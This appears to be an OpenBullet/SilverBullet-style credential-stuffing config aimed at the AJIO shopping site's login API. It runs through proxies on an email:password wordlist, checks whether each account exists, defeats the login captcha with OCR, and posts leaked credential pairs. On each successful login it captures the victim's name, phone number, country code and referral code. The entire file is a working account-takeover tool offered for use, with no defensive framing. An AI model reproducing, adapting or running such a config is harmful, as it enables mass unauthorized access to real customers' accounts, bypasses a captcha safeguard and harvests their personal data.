[SETTINGS]
{
  "Name": "AJIO",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-05T14:02:39.3926521+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "AJIO",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#POST_EMAIL REQUEST POST "https://login.web.ajio.com/api/auth/accountCheck" 
  CONTENT "{\"emailId\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: login.web.ajio.com" 
  HEADER "Origin: https://www.ajio.com" 
  HEADER "Referer: https://www.ajio.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-GPC: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#1 KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid input. Please provide a valid emailId or mobileNumber or profileId" 
    KEY "\"success\":false}" 
  KEYCHAIN Success OR 
    KEY "\"success\":true}" 

#OCR PARSE "<SOURCE>" JSON "captchaImage" -> VAR "OCR" 

OCR eng "data:image/png;base64, <OCR>" Base64=TRUE -> VAR "OCRR" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  

#LOG_USER_PASS REQUEST POST "https://login.web.ajio.com/api/auth/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"captchaInput\":\"<OCRR>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: login.web.ajio.com" 
  HEADER "Origin: https://www.ajio.com" 
  HEADER "Referer: https://www.ajio.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-GPC: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#2 KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Please enter correct password and captcha" 
  KEYCHAIN Success OR 
    KEY "{\"profileResponse\":" 

#name PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "name" 

#isocode PARSE "<SOURCE>" JSON "isocode" CreateEmpty=FALSE -> CAP "isocode" 

#phone PARSE "<SOURCE>" JSON "phone" CreateEmpty=FALSE -> CAP "phone" 

#userReferralCode PARSE "<SOURCE>" JSON "userReferralCode" CreateEmpty=FALSE -> CAP "userReferralCode" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

